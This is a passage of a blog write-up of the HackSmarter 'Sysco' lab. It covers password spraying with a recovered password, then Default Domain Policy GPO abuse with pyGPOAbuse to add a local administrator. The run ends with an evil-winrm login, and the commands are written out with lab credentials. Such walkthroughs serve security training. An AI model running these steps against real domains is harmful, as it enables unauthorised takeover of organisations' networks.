<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\Documents.-ssh netadmin@10.0.0.1 -pw 5y5coSmarter2025!!!</span><br></pre></td></tr></table></figure>

<p><strong>Discovered password:</strong> <code>5y5coSmarter2025!!!</code></p>
<h3 id="Credential-Spraying"><a href="#Credential-Spraying" class="headerlink" title="Credential Spraying"></a>Credential Spraying</h3><p>The domain has only three users plus the Administrator account. Testing this password against <strong>Greg.Shields</strong>:</p>
<p><img src="/images/Sysco/got-greg.png" alt="Greg.Shields Compromised"></p>
<p><strong>Successful authentication!</strong> We now have access to Greg.Shields’ account, which has GenericAll permissions over the Default Domain Policy.</p>
<hr>
<h2 id="Privilege-Escalation-via-GPO-Abuse"><a href="#Privilege-Escalation-via-GPO-Abuse" class="headerlink" title="Privilege Escalation via GPO Abuse"></a>Privilege Escalation via GPO Abuse</h2><h3 id="GPO-Abuse-Strategy"><a href="#GPO-Abuse-Strategy" class="headerlink" title="GPO Abuse Strategy"></a>GPO Abuse Strategy</h3><p>With GenericAll permissions on the Default Domain Policy GPO, we can abuse this to add a user to the local administrators group. I’ll use <strong>pyGPOAbuse</strong> to accomplish this.</p>
<p><strong>Repository:</strong> <a target="_blank" rel="noopener" href="https://github.com/Hackndo/pyGPOAbuse">https://github.com/Hackndo/pyGPOAbuse</a></p>
<h3 id="Adding-Administrative-User"><a href="#Adding-Administrative-User" class="headerlink" title="Adding Administrative User"></a>Adding Administrative User</h3><p>The following command adds a user named <strong>john</strong> (with password <strong>H4x00r123..</strong>) to the local administrators group:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 pygpoabuse.py &#x27;sysco.local&#x27;/&#x27;greg.shields&#x27;:&#x27;5y5coSmarter2025!!!&#x27; -gpo-id &quot;31B2F340-016D-11D2-945F-00C04FB984F9&quot;</span><br></pre></td></tr></table></figure>

<h3 id="Group-Policy-Update"><a href="#Group-Policy-Update" class="headerlink" title="Group Policy Update"></a>Group Policy Update</h3><p>For the GPO changes to take effect, we need to force a Group Policy update. From our WinRM session as Lainey.Moore:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpupdate</span><br></pre></td></tr></table></figure>

<p><img src="/images/Sysco/gpupdate.png" alt="Group Policy Update"></p>
<p>The Group Policy update successfully applies our malicious configuration.</p>
<hr>
<h2 id="Domain-Compromise"><a href="#Domain-Compromise" class="headerlink" title="Domain Compromise"></a>Domain Compromise</h2><h3 id="Administrative-Access"><a href="#Administrative-Access" class="headerlink" title="Administrative Access"></a>Administrative Access</h3><p>Now we can authenticate as the <strong>john</strong> user with local administrator privileges:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm -i 10.1.76.162 -u john -p &#x27;H4x00r123..&#x27;</span><br></pre></td></tr></table></figure>

<p>With local administrator access, we can:</p>
<ul>
<li>Access the Administrator’s home directory</li>
<li>Retrieve the root flag</li>
<li>Dump credentials from memory</li>
<li>Perform post-exploitation activities</li>
</ul>
<hr>
<h2 id="Conclusion"><a href="#Conclusion" class="headerlink" title="Conclusion"></a>Conclusion</h2><p>This penetration test demonstrated a complete attack chain against an Active Directory environment:</p>
<ol>
<li><strong>Reconnaissance</strong> - Service enumeration and username discovery</li>
<li><strong>Initial Access</strong> - AS-REP roasting to obtain credentials</li>
<li><strong>Enumeration</strong> - Email analysis leading to additional credentials</li>
<li><strong>Lateral Movement</strong> - Credential reuse across multiple accounts</li>
<li><strong>Privilege Escalation</strong> - GPO abuse via GenericAll permissions</li>
<li><strong>Domain Compromise</strong> - Local administrator access achieved</li>
</ol>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writeups</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/tags/">tags</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/PanosoikoGr">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#HackSmarter-Sysco-Complete-Penetration-Testing-Walkthrough"><span class="toc-number">1.</span> <span class="toc-text">HackSmarter Sysco - Complete Penetration Testing Walkthrough</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Introduction"><span class="toc-number">1.1.</span> <span class="toc-text">Introduction</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Initial-Reconnaissance"><span class="toc-number">1.2.</span> <span class="toc-text">Initial Reconnaissance</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Nmap-Scan-Results"><span class="toc-number">1.2.1.</span> <span class="toc-text">Nmap Scan Results</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#UDP-Scan-Results"><span class="toc-number">1.2.2.</span> <span class="toc-text">UDP Scan Results</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Hosts-File-Configuration"><span class="toc-number">1.2.3.</span> <span class="toc-text">Hosts File Configuration</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web-Enumeration"><span class="toc-number">1.3.</span> <span class="toc-text">Web Enumeration</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#HTTP-Service-Analysis"><span class="toc-number">1.3.1.</span> <span class="toc-text">HTTP Service Analysis</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Directory-Fuzzing"><span class="toc-number">1.3.2.</span> <span class="toc-text">Directory Fuzzing</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Active-Directory-Enumeration"><span class="toc-number">1.4.</span> <span class="toc-text">Active Directory Enumeration</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SMB-Enumeration"><span class="toc-number">1.4.1.</span> <span class="toc-text">SMB Enumeration</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#User-Validation-with-Kerbrute"><span class="toc-number">1.4.2.</span> <span class="toc-text">User Validation with Kerbrute</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Initial-Access-AS-REP-Roasting"><span class="toc-number">1.5.</span> <span class="toc-text">Initial Access - AS-REP Roasting</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#AS-REP-Roasting-Attack"><span class="toc-number">1.5.1.</span> <span class="toc-text">AS-REP Roasting Attack</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Hash-Cracking"><span class="toc-number">1.5.2.</span> <span class="toc-text">Hash Cracking</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Share-Access-Verification"><span class="toc-number">1.5.3.</span> <span class="toc-text">Share Access Verification</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bloodhound-Analysis"><span class="toc-number">1.6.</span> <span class="toc-text">Bloodhound Analysis</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Data-Collection"><span class="toc-number">1.6.1.</span> <span class="toc-text">Data Collection</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Attack-Path-Analysis"><span class="toc-number">1.6.2.</span> <span class="toc-text">Attack Path Analysis</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Email-Enumeration"><span class="toc-number">1.7.</span> <span class="toc-text">Email Enumeration</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Roundcube-Access"><span class="toc-number">1.7.1.</span> <span class="toc-text">Roundcube Access</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Email-Investigation"><span class="toc-number">1.7.2.</span> <span class="toc-text">Email Investigation</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Hash-Cracking-Round-2"><span class="toc-number">1.7.3.</span> <span class="toc-text">Hash Cracking Round 2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Credential-Validation"><span class="toc-number">1.7.4.</span> <span class="toc-text">Credential Validation</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Lateral-Movement"><span class="toc-number">1.8.</span> <span class="toc-text">Lateral Movement</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#WinRM-Session"><span class="toc-number">1.8.1.</span> <span class="toc-text">WinRM Session</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Credential-Discovery"><span class="toc-number">1.8.2.</span> <span class="toc-text">Credential Discovery</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Credential-Spraying"><span class="toc-number">1.8.3.</span> <span class="toc-text">Credential Spraying</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Privilege-Escalation-via-GPO-Abuse"><span class="toc-number">1.9.</span> <span class="toc-text">Privilege Escalation via GPO Abuse</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#GPO-Abuse-Strategy"><span class="toc-number">1.9.1.</span> <span class="toc-text">GPO Abuse Strategy</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Adding-Administrative-User"><span class="toc-number">1.9.2.</span> <span class="toc-text">Adding Administrative User</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Group-Policy-Update"><span class="toc-number">1.9.3.</span> <span class="toc-text">Group Policy Update</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Domain-Compromise"><span class="toc-number">1.10.</span> <span class="toc-text">Domain Compromise</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Administrative-Access"><span class="toc-number">1.10.1.</span> <span class="toc-text">Administrative Access</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Conclusion"><span class="toc-number">1.11.</span> <span class="toc-text">Conclusion</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://panosoikogr.github.io/2025/10/31/HS-Sysco/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://panosoikogr.github.io/2025/10/31/HS-Sysco/&text=HS-Sysco"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://panosoikogr.github.io/2025/10/31/HS-Sysco/&title=HS-Sysco"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://panosoikogr.github.io/2025/10/31/HS-Sysco/&is_video=false&description=HS-Sysco"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HS-Sysco&body=Check out this article: https://panosoikogr.github.io/2025/10/31/HS-Sysco/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://panosoikogr.github.io/2025/10/31/HS-Sysco/&title=HS-Sysco"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://panosoikogr.github.io/2025/10/31/HS-Sysco/&title=HS-Sysco"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://panosoikogr.github.io/2025/10/31/HS-Sysco/&title=HS-Sysco"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://panosoikogr.github.io/2025/10/31/HS-Sysco/&title=HS-Sysco"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://panosoikogr.github.io/2025/10/31/HS-Sysco/&name=HS-Sysco&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://panosoikogr.github.io/2025/10/31/HS-Sysco/&t=HS-Sysco"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2024-2027
    Panosoiko
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writeups</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/tags/">tags</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/PanosoikoGr">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
